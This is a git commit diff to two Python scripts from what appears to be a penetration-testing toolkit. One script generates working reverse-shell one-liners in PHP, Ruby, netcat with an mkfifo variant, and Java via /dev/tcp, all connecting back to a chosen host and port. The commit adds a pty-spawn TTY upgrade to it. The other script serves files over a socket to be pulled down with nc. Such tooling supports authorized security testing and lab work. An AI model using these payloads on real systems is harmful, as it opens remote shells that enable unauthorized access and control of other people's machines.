Rev Shell tty, upload file variable port

This commit is contained in:
Roman Hergenreder 2020-02-06 21:17:45 +01:00
parent a0476d4c17
commit fa84b17e4f
2 changed files with 10 additions and 8 deletions

@ -27,7 +27,7 @@ def generatePayload(type, local_address, port):
return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port) return "php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/bash -i <&3 >&3 2>&3\");'" % (local_address, port)
elif type == "ruby": elif type == "ruby":
return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port) return "ruby -rsocket -e'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/bash -i <&%d >&%d 2>&%d\",f,f,f)'" % (local_address, port)
elif type == "netcat": elif type == "netcat" or type == "nc":
return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port) return "nc -e /bin/bash %s %d\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc %s %d >/tmp/f" % (local_address, port, local_address, port)
elif type == "java": elif type == "java":
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port) return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
@ -48,10 +48,11 @@ if __name__ == "__main__":
if payload is None: if payload is None:
print("Unknown payload type: %s" % payload_type) print("Unknown payload type: %s" % payload_type)
print("Supported types: bash, perl, python[2|3], php, ruby, netcat, java, xterm") print("Supported types: bash, perl, python[2|3], php, ruby, netcat|nc, java, xterm")
exit(1) exit(1)
print("---PAYLOAD---\n%s\n---PAYLOAD---\n" % payload) tty = "python -c 'import pty; pty.spawn(\"/bin/bash\")"
print("---PAYLOAD---\n%s\n---TTY---\n%s\n---------\n" % (payload, tty))
if payload_type == "xterm": if payload_type == "xterm":
print("You need to run the following commands (not tested):") print("You need to run the following commands (not tested):")

@ -3,7 +3,7 @@ import sys
import netifaces as ni import netifaces as ni
if len(sys.argv) < 2: if len(sys.argv) < 2:
print("Usage: %s <file>" % sys.argv[0]) print("Usage: %s <file> [port]" % sys.argv[0])
exit(1) exit(1)
# Create a TCP/IP socket # Create a TCP/IP socket
@ -14,16 +14,17 @@ interface = "tun0"
if not interface in ni.interfaces(): if not interface in ni.interfaces():
interface = ni.interfaces()[0] interface = ni.interfaces()[0]
addresses = ni.ifaddresses(interface) addresses = ni.ifaddresses(interface)
address = addresses[next(iter(addresses))][0]["addr"] address = addresses[next(iter(addresses))][0]["addr"]
# Bind the socket to the port # Bind the socket to the port
server_address = (address, 8888) port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])
print('starting up on %s port %s' % server_address) server_address = (address, port)
sock.bind(server_address) sock.bind(server_address)
sock.listen(1) sock.listen(1)
print("Now listening, download file using:")
print('nc %s %d > %s' % (address, port, os.path.basename(FILENAME)))
print()
while True: while True:
# Wait for a connection # Wait for a connection